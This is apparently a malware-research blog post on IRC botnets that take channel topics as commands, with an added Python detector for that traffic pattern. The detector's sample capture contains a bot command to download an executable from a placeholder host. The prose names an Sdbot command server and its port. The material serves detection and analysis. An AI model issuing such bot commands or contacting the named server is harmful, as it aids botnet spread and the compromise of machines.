The vast majority of IRC-based bots seen these days can be said to be on “autopilot” in a sense. After joining a pre-defined IRC channel, the bots read the channel topic and accept it as a command. Authors of such bots just need to set these channels up with the correct commands and then leave it to the bots to spread and, possibly, go and earn money for their authors.

In general, such bots perform the following steps:

  1. Query for the domain where the IRC server resides
  2. Try to connect to an IRC server at some predefined set of ports
  3. Once connected to the IRC server, join a predefined channel by issuing the IRC “JOIN” command
  4. Read the topic for the channel and accept it as a command

Generally, the topic of the first channel instructs the bot to join other channels, the topics of which may in turn cause the bot to execute various commands or to join still more channels. The major functions that such bots perform for their author are (i) spread: increase the size of the botnet by scanning the network and infecting other vulnerable machines, and (ii) earn money: by downloading adware, stealing personal information, etc.
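The four-step sequence above (connect, JOIN, read the topic, act on it) leaves a recognisable trace in the bot's IRC traffic, and that trace is what a defender can look for. The following is an added example, not code from the original post or from McAfee Avert Labs: it parses RFC 1459-style IRC lines from a captured session and flags the “topic as command” pattern. The session, nick, channel names, host and the command prefixes (`.`, `!`, `$`) are all constructed placeholders, not values taken from a real bot family.

```python
import re
from typing import List, Optional, Tuple

# RFC 1459 message shape: [":" prefix SPACE] COMMAND [params] [" :" trailing]
IRC_LINE = re.compile(r'^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?: (?P<params>.*))?$')
CHANNEL = re.compile(r'[#&][^\s,]+')
# Assumed command prefixes: bot families differ, this set is only an illustration.
COMMAND_PREFIXES = ('.', '!', '$')


def parse_irc(line: str) -> Optional[Tuple[Optional[str], str, List[str]]]:
    """Split one IRC line into (prefix, COMMAND, args); a trailing ':' parameter is the last arg."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    params = m.group('params') or ''
    if params.startswith(':'):
        args = [params[1:]]
    elif ' :' in params:
        middle, trailing = params.split(' :', 1)
        args = middle.split() + [trailing]
    else:
        args = params.split()
    return m.group('prefix'), m.group('command').upper(), args


def topic_from(command: str, args: List[str]) -> Optional[Tuple[str, str]]:
    """Return (channel, topic) for RPL_TOPIC (numeric 332) or a TOPIC change, else None."""
    if command == '332' and len(args) >= 3:
        return args[1], args[2]
    if command == 'TOPIC' and len(args) >= 2:
        return args[0], args[1]
    return None


def analyze_session(capture: List[Tuple[str, str]]) -> List[str]:
    """capture: (direction, line) pairs, 'C' = client->server, 'S' = server->client."""
    findings = []
    topic_targets = {}   # channel named inside a topic -> channel whose topic named it
    seen_topics = []
    client_spoke = False
    for direction, raw in capture:
        parsed = parse_irc(raw)
        if parsed is None:
            continue
        _, command, args = parsed
        if direction == 'S':
            chan_topic = topic_from(command, args)
            if chan_topic:
                chan, topic = chan_topic
                seen_topics.append((chan, topic))
                # Heuristic 1: the topic reads like a command rather than a description.
                if topic.startswith(COMMAND_PREFIXES):
                    findings.append(f'command-like topic on {chan}: {topic!r}')
                for target in CHANNEL.findall(topic):
                    topic_targets[target.lower()] = chan
        elif direction == 'C':
            if command == 'PRIVMSG':
                client_spoke = True
            # Heuristic 2: the client JOINs a channel it was just told about in a topic.
            if command == 'JOIN' and args:
                for target in args[0].split(','):
                    source = topic_targets.pop(target.lower(), None)
                    if source:
                        findings.append(f'client joined {target} named in topic of {source}')
    # Heuristic 3: topics were read but the client never chatted, i.e. no human at the keyboard.
    if seen_topics and not client_spoke:
        findings.append('client read topics but never sent PRIVMSG (no human chat)')
    return findings


# Constructed sample session (not a real capture); every name and address is a placeholder.
SAMPLE_CAPTURE = [
    ('C', 'NICK bot-00123'),
    ('C', 'USER bot 0 * :bot'),
    ('S', ':irc.example.invalid 001 bot-00123 :Welcome to the network'),
    ('C', 'JOIN #entry'),
    ('S', ':bot-00123!bot@203.0.113.7 JOIN :#entry'),
    ('S', ':irc.example.invalid 332 bot-00123 #entry :.join #work'),
    ('C', 'JOIN #work'),
    ('S', ':bot-00123!bot@203.0.113.7 JOIN :#work'),
    ('S', ':irc.example.invalid 332 bot-00123 #work :.download http://placeholder.invalid/update.exe'),
    ('S', 'PING :irc.example.invalid'),
    ('C', 'PONG :irc.example.invalid'),
]

if __name__ == '__main__':
    for finding in analyze_session(SAMPLE_CAPTURE):
        print(finding)
```

The three heuristics are deliberately cheap: a command-shaped topic, a JOIN that follows a topic naming that channel, and a client that reads topics without ever speaking. Any one alone produces false positives (a human could be in a channel whose topic happens to start with “!”), so the session is reported with all of its findings and the combination is what makes the autopilot pattern stand out.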

Different bots may connect to different domains, ports and channel names and may download different adware, but the overall working mechanism remains the same: once the channel topics have been set, they all go about on their own, adding more machines to the botnet and earning money automatically. While his bots are on autopilot, the author may relax or maybe spend his time on things like researching new vulnerabilities to exploit, rather than sitting in a channel and issuing the same commands to each new machine that joins.

Some such bots have a funny side too, displaying humorous messages along with the IRC banner returned by the server. One example of such a bot is W32/Sdbot.worm.gen.h, which connects to forum.ednet.es on port 4915. The channel is still active at the time of writing.

McAfee Avert Labs has been observing such behavior lately, and it has also been talked about elsewhere recently. Even though the message claims to be one, this is not a “legit botnet”. It will happily issue commands to a bot to scan the network for vulnerable hosts and infect them. In fact, it is as insidious as any other botnet.

One can only see this message by connecting to the server with an IRC client or by looking at the bot's communication in an Ethereal capture. A normal user whose machine is infected will never see it. So, who is this message intended for?

Possibly it is just intended for the “readers” who analyze such threats. Every once in a while we see a malicious executable that contains a few strings just for fun, or to taunt the person analyzing the memory dumps. Similarly, I think this is just the fun part that malware authors and AV researchers share.

Or, if you like, it can be called a social engineering technique that malware writers may use to try to fool “readers” into believing that this channel, even if it is part of a botnet, is actually legal. It is, however, unlikely to stop researchers from adding detection for such bots, nor will it prevent the IRC channel from being taken down once discovered.

Such “special” responses could also potentially be used to obfuscate or encode the information being conveyed to the bot, so a banner that looks like a joke is still worth recording and examining rather than dismissed.